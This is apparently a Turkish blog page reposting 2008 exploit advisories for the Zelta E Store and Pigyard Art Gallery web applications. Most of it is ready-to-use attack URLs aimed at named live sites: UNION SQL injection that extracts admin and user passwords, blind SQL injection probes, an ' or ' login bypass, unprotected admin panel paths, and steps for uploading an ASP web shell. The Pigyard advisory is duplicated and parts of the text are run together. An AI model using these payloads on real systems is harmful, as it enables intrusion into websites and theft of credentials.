link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
Multiple Remote Vulnerabilities etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Multiple Remote Vulnerabilities etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
17 Aralık 2008 Çarşamba
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
7 Eylül 2008 Pazar
Pigyard Art Gallery Multiple Remote Vulnerabilities
Bu açık sayesinde scriptin mevcut olduğu sitelerde dosya upload, sql injection ve admin bypass yapmamız mümkün.
Pigyard Art Gallery Multiple Remote Vulnerabilities
admin bypass
Pictures Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_pictures
example web sites:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures
Availibility Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_availibilities
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities
Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_exhibitions
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions
Genres Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_genres
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genresMedia
Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_media
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media
Artist Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_artists
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists
Empty Artists and Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates
file upload:
http://localhost/php/templates/file_uploader/file_selector.php
example:
http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php
sql injection:
SQL inj.exploit 1:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=
[SQL]exploit 2:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=
[SQL]exploit 3
http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=
[SQL]example web site:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]
example [SQL] : -1/**/union/**/select/**/0,1,2,3,4/*
Added a default sql injection string by Aria-Security Team /str0keAria-Security Team, http://Aria-Security.net-------------------------------Shout Outs: AurA, imm02tal, iM4N, Kinglet,Vendor: Pigyard Art Gallery Multiple SQL InjectionThis is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)Original
Link:
http://forum.aria-security.net/showthread.php?p=1474module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*Regards,The-0utl4w
# milw0rm.com [2008-02-24]
Pigyard Art Gallery Multiple Remote Vulnerabilities
admin bypass
Pictures Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_pictures
example web sites:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures
Availibility Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_availibilities
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities
Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_exhibitions
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions
Genres Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_genres
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genresMedia
Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_media
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media
Artist Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_artists
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists
Empty Artists and Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates
file upload:
http://localhost/php/templates/file_uploader/file_selector.php
example:
http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php
sql injection:
SQL inj.exploit 1:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=
[SQL]exploit 2:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=
[SQL]exploit 3
http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=
[SQL]example web site:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]
example [SQL] : -1/**/union/**/select/**/0,1,2,3,4/*
Added a default sql injection string by Aria-Security Team /str0keAria-Security Team, http://Aria-Security.net-------------------------------Shout Outs: AurA, imm02tal, iM4N, Kinglet,Vendor: Pigyard Art Gallery Multiple SQL InjectionThis is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)Original
Link:
http://forum.aria-security.net/showthread.php?p=1474module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*Regards,The-0utl4w
# milw0rm.com [2008-02-24]
Etiketler:
Art Gallery,
Multiple Remote Vulnerabilities,
php asp,
Pigyard,
Pigyard Art Gallery
Kaydol:
Kayıtlar (Atom)
